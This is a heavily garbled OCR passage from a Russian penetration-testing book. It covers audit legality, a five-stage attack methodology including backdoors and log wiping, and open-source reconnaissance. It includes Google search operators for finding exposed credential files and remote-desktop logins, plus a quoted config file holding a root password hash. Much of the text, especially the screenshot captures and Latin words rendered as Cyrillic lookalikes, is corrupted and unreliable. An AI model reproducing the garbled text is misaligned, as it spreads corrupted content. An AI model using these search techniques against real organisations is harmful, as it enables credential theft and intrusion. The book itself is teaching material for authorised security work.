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Часть I 
НАПАДЕНИЕ 


Введение 


В мире информационной безопасности присутствует условное разделение лю¬ 
дей, занимающихся взломом ИС, на три группы — «черные шляпы» (Віаск Наі), 
«серые шляпы» (Сгау Наі) и «белые шляпы» ( \Ѵ' Ь ііе Наі). В чем же их принци¬ 
пиальное отличие? Первые занимаются незаконным взломом и проникновением, 
в свою очередь последние делают это в рамках правового поля. Вас наверняка 
заинтересует вопрос, а может ли быть взлом законным? Конечно, может! За¬ 
конным взлом информационных систем может быть в двух случаях — когда вы 
взламываете принадлежащие вам ИС или когда вы взламываете сеть организа¬ 
ции, с которой у вас заключено письменное соглашение о проведении аудита или 
тестов на проникновение. Вернемся к оставшимся двум категориям. Сгау Наі 
взламывают ИС-системы, но не используют полученный доступ или информа¬ 
цию в каких-либо своих целях, а сообщают о найденной уязвимости владельцу 
ресурса. К слову, некоторые компании, например Соо§1е, платят за предостав¬ 
ленную информацию о найденных в их продуктах уязвимостях и ошибках. И на¬ 
конец, Ѵѵііііе Наі занимаются исключительно законным аудитом ИС. 

Раз уж мы начали говорить о терминологии, затронем еще один термин — «взлом». 
Взлом — это незаконное проникновение в систему, тогда как тест на проникнове¬ 
ние — это уже законное действие. Конечно, это деление условно, все зависит не 
от терминологии, а от того, в каком контексте происходит данное действие. Тему 
законности мы уже рассмотрели выше. 

Также есть понятие аудита информационных систем. Вот тут уже есть большое 
отличие от взлома и даже от теста на проникновение. Во-первых, понятие аудита 
применяется только к законным действиям. Во-вторых, если тест на проникно¬ 
вение предусматривает поиск уязвимости и ее последующую эксплуатацию, то 
аудит предусматривает поиск и возможную эксплуатацию всех найденных ауди¬ 
тором уязвимостей. Тесты на проникновение предполагают, что хакер изначально 
ничего не знает о внутренней сети предприятия, — так называемый метод Віаск 
Вох. В аудите предусмотрен как метод Віаск Вох, так и \ѴІіііе Вох — когда аудитор 
получает доступ к конфигурации и полной информации обо всех ИС предприятия. 
В данной книге рассмотрена только методология Віаск Вох. 

Мы надеемся, что вы будете использовать информацию из данной книги только 
в целях законного взлома ИС. Пожалуйста, помните о неотвратимости наказания — 
любые незаконные действия влекут за собой административную или уголовную 


ответственность. 
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Как провести аудит законно? 

Конечно же, любой профессионал в области информационной безопасности хочет 
заниматься любимым делом на законных основаниях. Но взламывать системы, 
которые ты же и конфигурировал, не всегда бывает интересно. Гораздо приятнее 
помериться силами с профессионалами, находящимися по другую сторону барри¬ 
кады. Попробовать на прочность чужую сеть. 

Чаще всего такие люди являются частью команды, проводящей комплексный аудит 
безопасности информационных систем предприятий. Но иногда они устраивают 
тесты на проникновение и в индивидуальном порядке. 

Чтобы быть уверенным в правильности и законности своих действий, профессио¬ 
нал должен соблюдать следующие правила: 

□ получить от клиента письменное разрешение на проведение тестов на проник¬ 
новение или аудита И С; 

□ соблюдать соглашение о неразглашении, особенно в случае, если во время тестов 
был получен доступ к конфиденциальной информации; 

□ никакая информация, полученная во время работы с клиентом, никогда не 
должна стать известной другим лицам; 

□ проводить все тесты, согласованные с клиентом, и никакие другие. Например, 
тесты, нацеленные на проверку устойчивости систем к типу атак «отказ от об¬ 
служивания», должны проводиться только по предварительному согласованию 
и в строго обозначенный временной интервал. 

Обычно аудит информационных систем проходит в несколько этапов. 

1. Встреча с клиентом, обсуждение целей и средств. 

2. Подписание договора о неразглашении информации. 

3. Сбор группы участников аудита и подготовка расписания тестов. 

4. Проведение тестов. 

5. Анализ полученных результатов и подготовка отчета. 

6. Передача отчета клиенту. 


14 Глава 1 • Начало 


Методология взлома 

Аудит информационной системы можно условно разделить на пять этапов, которые 
идут последовательно, один за другим: 

1. Сбор информации (Соо§1е, \ѴЛѴЛѴ, ОМ$); 

2. Сканирование системы (ріп§, рогі 8сапиіи§); 

3. Получение доступа (эксплуатация уязвимости); 

4. Закрепление в системе (Ьаскбоог); 

5. Скрытие следов пребывания (очистка лог-файлов, гооікіі). 

Данный цикл может повторяться итеративно. Например, в случае, когда мы полу¬ 
чили доступ к серверу, через который можно проникнуть во внутреннюю сеть. Тогда 
мы сначала собираем информацию о внутренней сети, а затем используем ее для 
дальнейшего проникновения. 

Данная методология является всего лишь приблизительной. Обычно у людей, 
занимающихся вопросами информационной безопасности, есть своя методика, 
основанная на их специфических требованиях и уровне профессиональной ком¬ 
петенции. Мы рекомендуем вам также ознакомиться с 055ТМ — Ореп Зоигсе 
ЗесигіГу ТезНп§ МеіІккІоІоду Это открытый стандарт, в котором рассматривается 
методология аудита безопасности ИС-систем. 


Этап первый: пассивный и активный 
сбор информации 

Прежде чем начать активный взлом системы, нам надо собрать как можно больше 
информации о нашей цели. Можно сказать, что от того, насколько хорошо мы будем 
знать нашу цель, напрямую будет зависеть успех или провал всего мероприятия. 
Это самый важный этап аудита системы, на который чаще всего уходит большая 
часть времени. 

Условно сбор информации делят на активную и пассивную фазы. Во время пас¬ 
сивной фазы наша «цель» не знает о том, что мы начали сбор информации. На 
данном этапе мы используем информацию только из отрытых и общедоступных 
источников, таких как поисковые системы и базы данных N10. Также к пассивному 
сбору информации можно отнести сниффинг — когда мы просто перехватываем 
всю приходящую на наш сетевой интерфейс информацию и при этом ничего сами 
в сеть не посылаем. 

Под активным сбором информации подразумевается непосредственное взаимо¬ 
действие с системой. И скорее всего, данная активность будет занесена в журнал 
аудитации целевой системы. 
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К данной фазе можно отнести сканирование портов, определение работающих 
сервисов и их версий, а также определение версии операционной системы, под 
управлением которой работают данные сервисы. 


Этап второй: сканирование системы 

Предположим, что, используя добытую на первом этапе информацию, мы получили 
из открытой базы данных КІРЕ диапазон ІР-адресов целевой организации. После 
этого мы начинаем сканирование всей подсети предприятия. 

На данном этапе чаще всего используются: 

□ сканеры открытых портов; 

□ ІСМР-сканеры; 

□ 8КМ Р-скаперы; 

□ сканеры уязвимостей и т. д. 

Во время данного этапа аудитор может получить следующую информацию: 

□ имена компьютеров; 

□ версию операционной системы; 

□ запущенные сервисы и их версии; 

□ ІР-адреса; 

□ учетные записи пользователей и т. д. 

Этап третий: получение доступа 

После получения информации в результате предыдущего этапа мы можем ис¬ 
пользовать ее для проникновения в систему. Например, мы узнали, что на одном 
из хостов установлен 118. Используя версию и название сервиса, можно найти 
уязвимость, а затем и поэксплуатировать ее. 

Одни из самых популярных методов — перехват сессии, переполнение буфера 
и отказ от обслуживания. 


Этап четвертый: закрепление в системе 

Поскольку редко получается проникнуть в систему с наскока, мы хотим исполь¬ 
зовать повторно полученный однажды доступ. Нам нужна возможность продол¬ 
жить начатое ранее тестирование, не прибегая к очередному взлому той же самой 


системы. 
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Самые популярные методы сохранения доступа к системе — установка троянских 
коней, ЬасЫоог’ов и гооі кіГов. 


Этап пятый: скрытие следов пребывания 

Итак, мы получили доступ к обозначенной системе и контролируем ее. Разумеется, 
мы не хотим, чтобы кто-то из ИТ-персонала компании заметил наше присутствие. 
В противном случае мы можем потерять доступ не только к полученной системе, 
но и к сети в принципе. 

Чаще всего стирают следы присутствия из журналов аудитации, а также события 
из базы данных ГО8 (системы обнаружения атак). 


Резюме 

Помните, что любой аудит информационной системы по сути представляет собой 

ее взлом, разница только в том, насколько легитимны проводимые мероприятия. 

Чтобы ваши действия были законными, необходимо получить письменное согласие 

заказчика. Обязательно обсудите заранее все действия, методы и риски и зафик¬ 
сируйте их документально. 

Проведение аудита осуществляется в несколько основных этапов: 

□ Планирование и получение согласия. 

□ Пассивный сбор информации — получение данных из открытых источников, 
нет прямого взаимодействия с системой, действия очень трудно обнаружить. 

□ Активный сбор информации — получение данных от целевой системы, все 
действия могут быть обнаружены, администраторы могут принять меры для 
пресечения дальнейших действий. 

□ Доступ к системе идет по средствам эксплуатации найденных уязвимостей. 

□ Закрепление в системе необходимо для того, чтобы продолжить атаку, не при¬ 
бегая к повторному взлому. 

□ Скрытие следов пребывания поможет остаться незамеченными и продолжить 
проведение аудита. 
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Получение информации 
из открытых источников 


Введение 

Первый этап взлома любой И С начинается со сбора максимального количества 
информации о цели. Практически никогда не удается собрать всю информацию из 
одного-единственного источника. Данные приходится собирать из множества раз¬ 
личных мест (БД, НТМБ-код, новостные ленты и т. д.), с тем чтобы впоследствии, 
как из кусочков мозаики, составить полную картину ИС организации. 

На данном этапе выявляются слабые места сети, через которые в будущем и будет 
осуществляться проникновение в систему. При правильном подходе можно не 
только выявить потенциально уязвимые места, но и наметить возможные векторы 
атаки на обозначенную цель. 

Мы условно разделили процесс сбора информации на следующие шаги. 

1. Поиск в открытых источниках. 

2. Сбор основной информации. 

3. Сбор информации о сети. 

4. Поиск активных хостов. 

5. Поиск открытых портов. 

6. Определение ОС. 

7. Определение сервисов. 

8. Построение карты сети. 

В этой главе будут рассмотрены технологии поиска в открытых источниках. 

В зависимости от размера организации объем собранной информации может 
варьироваться от десятка строк до сотен страниц текстовой информации. Важно 
не только собрать, но и грамотно обработать полученные данные. 
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Получение информации из открытых источников 


Инструмент анализа каждый волен выбирать сам, будь то логические схемы, доска 
и маркеры или клейкие бумажки на стенах, — главное, чтобы в результате инфор¬ 
мация была обобщена и представлена в удобном и читабельном виде. 


Что искать? 

Для проведения успешной атаки нам пригодится ЛЮБАЯ доступная информация 
о предприятии. 

Обычно, имея только название организации, начинают сбор следующих данных: 

□ домены; 

□ сетевые адреса или сетевые блоки; 

□ местонахождение; 

□ контактная информация; 

□ новости о слиянии или приобретении; 

□ вакансии; 

□ ссылки на связанные с организацией веб-сервисы; 

□ различные документы; 

□ структура организации. 

Это только примерный список, и продолжать его можно достаточно долго. Напри¬ 
мер, просмотрев вакансии предприятия, можно узнать, какие ИС используются 
внутри организации. А проанализировав НТМБ-код домашней странички, можно 
найти ссылки на внутренние ресурсы. 

От того, как будет проведен сбор информации, зависит направление, а также тип 
и успешность атаки. 

Большая часть процесса сбора информации не требует специальных знаний, до¬ 
статочно умения пользоваться поисковыми системами. Зачастую они индексируют 
даже ту информацию, которую пытались скрыть от внешнего мира. 

Использование Соодіе 
для сбора информации 

Хакер или аудитор может использовать для сбора информации не только Сооціе, 
но также УаЬоо или любой другой поисковый сервис. 

Основная цель данного раздела — научиться применять операторы поиска, которые 
облегчат и ускорят сбор информации. Без них отыскать нужную информацию будет 
не просто сложно, но практически невозможно. 
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Например, по запросу гоуаітаіі Соо§1е выдает около 61 800 000 результатов. 
По запросу зііеігоуаітаіі.сот — 261 000, а после уточнения зііетоуаітаіі.сот 
ІіІсТурсхІос — всего 5. 

Таким образом, мы из полумиллиарда результатов поиска отфильтровали только 
то, что нам было интересно. 

С основами использования операторов Оооціс можно ознакомиться здесь: кіір:// 
тт).§оо§Іе.сот/ІгеІр/Ьа5ІС5.кітІ. 


Ограничение поиска одним сайтом 

Оператор зііе ограничит вывод результатов запроса информацией с одного сайта, 
например: 8І1е:піс.ги. 


5Ііе:гоуаІтаі1.сот - Поиск в боодіе - Моііііа Ріге^ох 

/ 3 зіІе:гоуаІтаі1.сот - П... х + 


О Ѳ € 


4 1 Сі) А Ь«р5://ѵллѵѵлдоодІе.ги/?д^е_гсІ=сг8.еі=Мх4СѴ | О 110.5еагсЬ | ф О ф 4- 'А' 

|§3 Мозі ѴІБІІегі ▼ |||(Жепзіѵе Бесіігііу \КаІШпих \Ка1Юос5 \КаІіТооІз ЦЕхрІоіІ-ОВ \Лігсгаск-пд 

ѲоОдІв 5ІІе:гоуаІтаіІ.сот ЕЭ I 


□се Картинки I Іовости Покупки Карты Ещё ~ Инструменты поиска 


Результатов: примерно 261 000 (0.24 сек.) 


ссылки оооаіе 

Попробуйте Соодіе ЗеагсМ Сапзоіе 

ѵѵлѵ/.доодіе.сотл/ѵеогпазіегз/ 

Вы являетесь владельцем гоуаітаіі. сот? Получите данные индексирования и 
рейтинг от Соодіе. 


РоуаІ МаіІ | РоуаІ МаіІ Сгоир Исі 

ѵѵѵтгоуаітаіі.сот/ ж Перевести эту страницу 

Яоуаі МаіІ іэ ІНе ІІК'5 тозі Ігизіесі ІеПегз алО рагееіз Реііѵегу сотрапу. №е ргоѵіОе а 
Ѳчіауь-а-ѵуеек, тіе-ріісеч|оез амуѵгііеіе розіаі зегѵісе асіоьз ІНе УК. 


ЗепсІ а РагсеІ Іо Отап {гот ІНе ІІК | РоуаІ МаіІ Ѳгоир ИЙ 
тлѵ.гоуаітаіі.сот >... > Соитгу диійез » перевести эту страницу 
А еоуаі маи дикіе ю розипд ю Отап Тгот іпе УК. і_еагп еѵегушпд уои леей ю кпоѵѵ 
оеіоге зепатд уоиг іепегз апй рагееіз іо отап. 

Зепгі а РагсеІ (о Ыаиги Ггогп іМе ІІК | РоуаІ МаіІ Сгоир Ш 
ѵлллѵ.гоуаітаіі.сот »...>Соипігу дикіез ▼ Перевести эту страницу 
А РоуаІ МаіІ диіНе Іо розііпд Іо Маиги Тгот ІНе УК. 1_еат еѵѳгуШіпд уои леей Іо кпом/ 
ЬеГоге зепРіпд уоиг Іеііегз апсі рагееіз (о КІаиги. 


ТтаІІ | РоуаІ МаіІ Сгоир исі 

ѵѵмѵ.гоуаітаіі.сот/ТтаІІ ^ Перевести эту страницу 

РсасН ІНо Ьіддссі оѵсгссас сопаитсг оГ Вгііісіі ргоОисіо циіекіу. сасііу алО сосі 

сГТссІіѵсІу Ьу ссіііпд МѵоидЬ оиг ТтаІІ сіосс. 


Рис. 2.1. Результат работы запроса 5І1е:гоуаІтаіІ.сот 
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Обратите внимание на то, что система выдала только те результаты, которые от¬ 
носятся к сайту гоуаітаіі.сот. 


Поиск файлов определенного типа 

Предположим, что мы хотим найти все документы типа бос на сайте исследуемой 
организации. Для этого мы будем использовать оператор ШеГуре — ШеГуреДос. 

В результате мы получили список всех публично доступных файлов указанного 
формата с требуемого сайта. 

В качестве еще одного примера можно привести следующий запрос: гооГр\ѵ 
ГіІсі:урс:сГц. 


$ііе:гоуаІтаіІсот Шеіуре;сіос - Поиск в боодіе - Могіііа Ріге^ох О О С 

б сііегтуаітаіі.сот х + 

4 : Ф й I Шр5://ѵуѵ^ѵ/.дсх)дІе.ги/?д^е-гсІ-сг&еі-Мх4СѴ С* [ | Ч 5еагсЬ _| ф ЁЭ Ф 4 # = 

[§3 Мобі ѴІБІІегі ▼ Ц|(Жеп5Іѵе 5есигііу \КаІі Ыпих \КаІі0ос5 \КаІіТооІ5 ЦСхрІоіІ-0В ^Аігсгаск-пд 

Ѳоодіе 5ІІе:гоуаІтаіІ.сот Шеіурехіос ш 


Все Картинки Новости Покупки Карты Рщё ▼ Инструменты поиска 


Результатов: 0 (0.24 сек.) 

10001 С?А - РагсеІТогсе 

\АЛллѵ.гоуаІтаіІ.сот/.../МаіІтагк-рА-Рогт.(1о... ▼ Перевести эту страницу 
Рогт В Маііріесе Л Ргіпгіпд АссгеНіІяІіоп 

|оос| Айѵепізіпд МаіІ ЫдМ Сгесііі Арріісаііоп - Коуаі МаіІ 

ѵіллм.гоуаІтаіІ.сот/.../НМ Сиэіотег Сгесііі ... ▼ Перевести эту страницу 
АйѵеЛізіпд МаіІ ЫдМ. 

10001 <ЗиаІііу Аззигапсе Тогт - Коуаі МаіІ 

\ллѵѵѵ.гоуаІтаіІ.сот/.../МаіІтагк-риаІііу-А55иг... ▼ Перевести эту страницу 
20 апр. 2016 г. - Ропті В Маііріѳсѳ & Ргіпііпд Ассгѳсіііаііоп. 

10001 (Зиаіііу Аззигапсе Іогт - РоуаІ МаіІ 
шл«.гоуаІтаіі.сот/.../маіІтагк-оиаІИу-А$5иг... » перевести эту страницу 
1 июн. 2015 г. • Рогт в маііріесе & рпттд Ассгешіаііоп. 

10001 1 Сопіасі Осіаііз Коуаі МаіІ 

\ллѵѵіг.гоуаІтаіІ.сот/.../5таП5іатр_ТссЬпісаІ_... ~ Псрсоссти эту страницу 
3 мал 2012 г. ВтаЛВіатр ТссИпісаІ Тірс. 


10001 1 Сопіасі Оеіаііз - Коуаі МаіІ 

ѵиѵлѵ гпуаітаіі.сот/. ./ЯтагТ5йатр%?0ТесМпі... ▼ Перевести эту страницу 
ь апр. 2012 г. - ытіалыатр іесптсаі Іірз. 


Рис. 2.2. Результат работы запроса зііе:гоуаітаіі.сот ЯІеІуреДос 
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гооірѵѵ Ніеіуре.с^д - Поиск в Соодіе - Могіііа Ріге^ох О О С 

5 гоо1р\л/І1ІРІурр.г*д - „ х + 

4* СР й Ьир5://ѵ'лѵѵѵ.доодІе.т/?д(е-гсі-сг&еі-Мх4С\ С 11Ч БеагсЬ _ Ф ЁЗ © 4 А = 

|§д М обі Ѵізііегі ▼ ІЦО^епБІѵе Бесиг^у \КаІШпих \КаІЮос5 \КаІіТооІ5 ЦСхрІоіІ-ОВ ^Аігсгаск-пд 

ѲоодІѲ гооірѵѵ Шеіуре.сТд г ШШі 


Все Картинки Новости Видео Карты Ещё^ Инструменты поиска 


Результатов: примерно 5 300 (0.40 сек.) 

Совет. По этому запросу вы можете найти сайты на русском языке. Указать 
предпочтительные языки для результатов поиска можно □ разделе Настройки. 


ІіІеіурехТд кв іпіехі.тооірѵѵ -затріе -іеві -ПоѵЯо - ЕхрІоК Оаі... 

Ьпр5:/АдлдлА/.ехрІоіі-сІЬ.сот/дЬ(іЬ/288/ ▼ Перевести эту страницу 
АпасопРа із а Ііпііх еопЯдигаіюп іооі Ііке уазі оп зизе Ііпих. ТПе гооі раззиюгй із 
оЛрп рпегурімі - Іікя тгіБ ог геагі (гот ІПе зПагілж Яптеіітря ап аПаскег 


Соодіе Наскіпд Тог РепеТгаііоп Тезіегз 

Нирі>:/Л)оокі>.доодІе.ги/Ьоокі)?іі>Ьп... - Перевей и эіу сіраницу 
ЛоНмпу Ьопу. ВіІІ Сакінег. .ІиЫігі Віиѵѵті - 2011 - Сілприіеіъ 

... СеПіЯсаІе Зетѵісез сопЛдигаііоп ЛІе ИоСаіАиРі сопЛдигаІіоп ЯІе Я1егуре.с(д ... 
іпІехСраззѵгогЛ -затріе -Іезі -Шіогіаі -ОоѵѵпІоаО ЯІеІуре:С(дкз іпіехі гооірѵѵ ... 

ѵѵогкзіаІіоп-кв.сТд 

Ьар5://и5дсЬ.пІ8і.доѵ/и5дсЬ/...Аѵогк8іаііоп-к5.с... ▼ Перевести эту страницу 
АгМіпд изегз алО зеПіпд раззшоггіз: И ТНегѳ аге 3 орііолз (ог зеПіпд гооірѵѵ (ог аййіпд 
нявг аг.г.оипія Л раяяѵѵоггія) И 1 По поГ іпсііній іПй гпотрѵѵ соттапгі 


РаТа РаТаеІ - Китриіап Сага Ііаскіпд Іеѵѵаі доодіе •... | Расе... 

Ііирі>://ѵѵѵѵѵѵ.(ас;еЬоок.сопі/..76021595064962... ж Перевеии эіу сіраницу 
ІіІеІуре.сГу шііу “ІаіуеІ[*]“ -ьшпріе -сѵь -ехашріе ... інші."ьіар<1і;онГ іиІехІ.“гооІрѵѵ" 
-талраде -"МапиаІ Раде” -тал: -затріе ... іпиг1:зегѵег.с(д гсоп раззѵѵогР 


Рис. 2.3. Результат работы запроса гоокрѵѵ Л1е1;уре:сТд 


Перейдя по одной из ссылок, можно обнаружить файл с очень интересным текстом: 

# (КелиігесІ) ЗеТз ТЬе гооТ раззмогсі зо ТЬеге І5 по рготрТ сіигіп§ іпзііаііаіііоп 

# Ехатріе: епсгурТесі раззмогсі І5 "разхмогсі" 

гооТрм - -іасгурТесІ $6$па5уТумР$АуѴеКРсхп5МЗб2Ь5Ь5ѴІдіеи7ѴРт§СІдІ30Н31ятрѵ]ВВОВІЬі 
риріс5ТиЗпс1т05П53ѵРрхевх053іо-РАКе914сІіх0 

# ЕпаЫе ТИе -Рігеыаіі 
■Рігемаіі --епаЬІесІ 

В данном случае мы нашли и открыли файл ѵѵогкхтаі іоп-кз.сф. Этот файл остается 
на Ілпих-машине в том случае, если она была сконфигурирована автоматически. 
В нем содержатся все необходимые параметры для конфигурации машины без 
участия пользователя, в том числе и пароль пользователя гоок. 
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Получение информации из открытых источников 


Поиск определенных частей сайта 

Теперь усложним задачу и найдем область сайта, защищенную паролем, — место 
возможного проникновения. 


І_од Іп | Роуаі Маіі бгоир І_Ы - Могіііа РігеГох 0 0 0 

& Іод-іп 5і*е:гоуаІтаі1.с... х / Ьод Іп | Коуаі Маіі Сг.„ х + 

4- (I) А пир5://ѵлѵѵлгоуаІтаі1.сот/Ьи5іпс55/и5СГ/Іодіі (? ||О.Ьсагс& ☆ Й © 4- # = 

(^]Мо^І - Ѵічіі-есі ▼ |)|СЖеп«;іѵе Яегигііу \КаІіІігипс Ч^КаІіПогя \КаІіТоок ЦРхрІоіЬПВ ^Аігггагк-пд 



Рис. 2.4. Форма для ввода логина и пароля, 
найденная при помощи запроса Іод-іп 5і1;е:гоуаІтаіІ.сот 

В качестве примера доступа к закрытым частям \ѵеЪ-страничек можно привести 
поиск МісгозоЙ Репине Псзкгор \ѴеЪ Соппесі іоп. Для этого поиска мы будем ис¬ 
пользовать следующие операторы: 

□ іпигі — ищет заданный текст только в игі сайта; 

□ іпі іі іс — ищет информацию, исходя из заголовка документа. 

Перейдя по одной из первых ссылок, мы сразу же обнаруживаем форму для ввода 
данных и подключения к системе через протокол КОР. 
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іпііііе: "гетоіе гісэкіор ѵѵсЬ соппесііоп" іпигкізѵѵсЬ - Поиск в Соодіе - Могіііа Рігс^ох О 0 О 


3 іпііііе: "гетоіе сіеькі... х ^ * 


Ф й Шр5://ѵѵ^ллѵ.доод^е.^и/?д^е_^сI-с^&еі-^ 


-Мх4СѴ О 11 О*, 5еагсІі ф (Ё Ѳ ^ # = 

ЗМовІѴКіІвсІт ЩСЖрпяіѵр Нргигііу \КаІі I іпих \КаІіІ)ося \КаІі IооК Ці-хрІоіГ-ПВ ^Аігггагк-пд 


Оо дІ0 іпііііе; "гетоіе ііезкіор ѵѵеЬ соппесІіогГ іиигкЬѵѵеЬ 


Все Видео Картинки Новости Покупки Ещё ▼ Инструменты поиска 


Результатов: примерно И (0.33 сек.) 

Ретоіе Оезкіор ѴѴеО Соппесііоп 
согр.сѵп.оп.са/ізѵѵеЬ » перевести эту страницу 

Кепшіе ОеъКіор ѴѴеЬ Соппесііші. Ыие Ьаі ціаріпс. Туре ІІіе паше оГ ІІіе гетоіе 
сотриіег уои ѵѵапі Іо иве. 5еІесІ ІЬе зегееп эіге Тог уоиг соппесііоп. агкі ІЬеп ... 


Кетоіе Резкіор \Л/еЬ Соппесііоп 

и/илѵарр.Ьитс.Ьи.егіи/1$ѵѵеЬ/ ▼ Перевести эту страницу 

кетоіе оезкіор ѵѵеь соппесііоп. ыие оаг дгартс. ьеіесі те зегееп зіге тог уоиг 

соппесііоп. апо теп снек соппесі. Ріеазе сопіасі те вумс неіроезк аі... 


Ретоіе сіезкіор ѵѵеЬ соппесііоп Т5ѴѴЕВ - Ветоіе Оезкіор ... 

ѵлѵѵ/.іотзІіаг(іѵѵаге.сот/..7216291-46-гетоіе-... ▼ Перевести эту страницу 
5 июл. 2005 г. - Сообщений: 2 

Іо із ІмИ \«Ьеп ікіпд Ше гетоіе гіезкіпр ѵѵеЬ соппесііоп ТЗ\А/РВ іі Гайя яауіпд ІЬаІ 
еііпег гетоіе ахх із азіаоіео ѵѵпіеп із тооізп аз і сап 


Пстоіс Оезкіор ѴѴсЬ Соппесііоп 

ѵѵѵѵѵѵ.спдг.рзи.с(іи/ас/..Л’5Ѵ\/сЬ/{ісІаиІі.Ьіт ~ Псрсоссти эту страницу 
ѴРЫ Ю СОЕ ів гѳяиігѳО Іо ѳвіаЫівЬ а соппесііоп. Моте іпіо Ьегѳ. №оІ вцге и/ЬаІ Іо риі 
іп іог 1Ье АЕ Сотриіег Мате? РіпО опе Ьеге. Ѵои МУЗТ изе Іпіетеі... 


іп(ИІе:"Рето(е Оезкіор ѴѴеЬ Соппесііоп" іпигІ:ізѵѵеЫИ+4лі8... 

(1ісі.сп/іптіе%ЗА%22Ретоіе%200е5кіор%20... ▼ Перевести эту страницу 
Жі^іЗІЙ.вІХі&Ю^^і^Й.Л&йІ&іпЙІІе: ... То Ооѵѵпіоасі апО іпзіаіі ІЬе ГСетоІе 
йсокіор Ѵ/сЬ Соппесііоп оп ѴЛпйоѵѵс МТ 4.$ТЛіз^Й®Ѵ/сЬіІЙЛ'|§М ... 


Рис. 2.5. Результат запроса іпііііе: «гетоіе сіезкіор ѵѵеЬ соппесііоп» іпигЫзѵѵеЬ 

Соодіе Наскіпд 

Вышеупомянутую поисковую систему можно использовать не только для сбора 
информации, но и для поиска уязвимостей. В наши дни, когда все больше и больше 
приложений делается ориентированными на пользователей сети Интернет, уязви¬ 
мые версии данных аппликаций легко находятся через Соо§1е. 

В Интернете есть два ресурса, которые мы хотели бы порекомендовать как содер¬ 
жащие большую базу данных хорошо категорированных запросов для поисковой 
системы Соо§1е: 

□ ытт.ехрІоіі-сІЪ.сот/^оо^Іе-сІоі-кз/', 

□ хюхюѵо.каскег^огскагііу.ощ. 
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КетоТе ОезкТорѴѴеЬ СоппесТіоп - МогіІІа РігеТох О Ѳ О 

5 іпШе: "гетоіе йезкТ... х у Кетоіе Оезкіор ѴѴеЬ Со... х \ + 

СО I согр.сѵк.оп.са/Ізѵ/еЬ/ С 11 Я ЬеагсР О 6 Ѳ ■& й = 

®Мо5ІѴІ5ІІе(1т ЦОНеп^іѵе 5есигіТу \КаІШпих \Ка1і0ос5 \Ка1іТооІ5 ОЕхрІоіІ-ОВ КАігсгаск-пд 



Туре Иіе пате оТ 
ІЬе гетоіе 
сотриіег уои 
ѵѵапі Іо изо, зоіосі 
Т.ке зегееп зіте Тог 
уоиг еоішесііоп, 
ап(1 ІЬеп сііск 
СоппесТ. 


5егѵег:|- 

5іге: | ТиЦ-зсгееп т | 

□ 5епй Іодоп іпТогтаІіоп Тог ІЫз 
соппесіюп 


ѴѴЬеп ІЬе 
соппесііоп раде 
орепз. уои сап 
асЫ іі Іо уоиг 
Раѵогіісз Тог сазу 
ппппесііпп То Т.Ье 
заше сотриіег. 


Цзег пате: [ 
ІЗотаіп: Г 


^Соплвоі^ 


Рис. 2.6. Форма для подключения к удаленному рабочему столу через веб-интерфейс 


Используя информацию с этих серверов, можно быстро и эффективно находить 
уязвимые веб-приложения, а также файлы, содержащие пароли, личные данные 
пользователей и другую информацию, которая поможет скомпрометировать це¬ 
левую систему. 


Поиск информации о людях 

Свою цель надо знать в лицо, в буквальном и переносном смысле. Если вы нашли 
список сотрудников данной компании, то будет полезным собрать о них как можно 
больше информации. Довольно часто бывает, что взлом ресурса, который, казалось 
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бы, не имеет никакого отношения к организации, которую мы пытаемся взломать, 
приводит к ее компрометации. Такое возможно, если сотрудники используют одни 
и те же пароли для доступа к различным системам. 

Есть сайты, которые специализируются на поиске информации о людях, на¬ 
пример Зрокео, 2аЪа5еагсЬ, но они предназначены в основном для западных 
пользователей. 

Для нас же лучшим местом поиска информации, равно как и для западных коллег, 
остаются социальные сети. Благодаря тому, что ими пользуется огромное количе¬ 
ство людей, они становятся бездонным источником информации. По ним можно 
отследить все — карьеру, образ жизни, интересы и многое другое. Ведь взламывать 
сеть лучше тогда, когда ее администратор находится в отпуске на Канарских остро¬ 
вах или отдыхает в ночном клубе, чем когда все оборудование находится под его 
чутким присмотром. 

Для поиска информации подойдут любые социальные сети — РасеЪоок, Соофе+, 
ѴК, Тѵѵіиег, Іпзга^гат, БіикесИп, «Одноклассники» и т. д. 

Для упрощения задачи существует один интересный ресурс — ЕсЬозес. Данный 
сервис показывает все записи в социальных сетях, которые были сделаны в опреде¬ 
ленном месте. Как это может нам помочь? Самое первое, что приходит на ум, — по¬ 
смотреть, что происходит за закрытыми дверями организации. Люди часто делают 
фотографии и сразу же загружают их в социальные сети. Так почему бы нам этим 
не воспользоваться? 

Еще один сервис, который поможет нам упорядочить информацию, называется 
МаКе§о. Этот инструмент поможет не только найти информацию об интересую¬ 
щей нас организации, но также покажет нам, как связаны между собой отдельные 
элементы. 


Архивные данные 

Очень часто организации публикуют на своих сайтах такую информацию, которая 
впоследствии может быть использована против них самих, а затем, заметив ошибку, 
удаляют ее. 

Другой пример: вы заметили на сайте вакансию, но в силу определенных обсто¬ 
ятельств не смогли ее сохранить, а на сегодняшний день она уже неактуальна 
и организация удалила ее. 

В таком случае нам поможет очень ценный ресурс — агскіѵе.ог§. Он позиционирует 
себя как машину времени для сети Интернет. Жаль только, что путешествовать 
можно только в прошлое, а не в будущее. 

Этот ресурс периодически сохраняет копии практически всех сайтов в глобальной 
Сети и предоставляет бесплатный доступ ко всей своей базе данных. 
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ЫеІхтаЯ: 


Очень полезный сервис, позволяющий узнать различную важную информацию 
о целевом сервере, включая версии его ПО и ОС, поддомены, ІЖЯ-серверы, исто¬ 
рию сервиса и многое другое. 


5і*е герог* Л>г ѵѵплгѵѵ.гоуаітаіі.согп - Мохіііа Нге?ох 


ООО 


[п 51м герогг Іог ѵлѵѵѵ.г... х \ * 


4 *) ® ;осІЬдг.пс 1 сгаК,сот/ 5 і:с_гсрог['иг 1 =Ь«р://\'.ѵ.ѵ.- с 110 , 5 сагсН 


☆ е о а = 


ОАТАРІРЕ 


МОГШ СІЯ88, 

НідЬ Регіогтвпсв N8^0^ 


5іІе герогі Тог ѵтѵл/.гоуаітаіі.сот 


ЕеагсЬ... 


ЫеісгаЛ Ехіепзіоп 

,*) Ноте 

«] ОоѵѵпіоасІ кіоѵѵ! 

*) НѳроП а РПІбИ 
^ Вііс Ясрогі 
♦) Тор Перогіегз 
*) Іпсепйѵез Юг герогіегз 
♦1 РМізІііеЫТЮз 
♦I Рпізпіезісоипшез 
♦1 РПІЗПіеЗІ Н05ЮГ5 
±і РПізпіезі се птсаіелитопиез 
РИічЬіпд Мяр 
Такргітѵп Мяр 
*) Мо5І Рориіаг Ѵ/еЬзіІез 
♦) ВгапОѳО Ехіѳпбіопб 
^ ТсІІаРгістІ 

РЬізЫпд & Ргаисі 


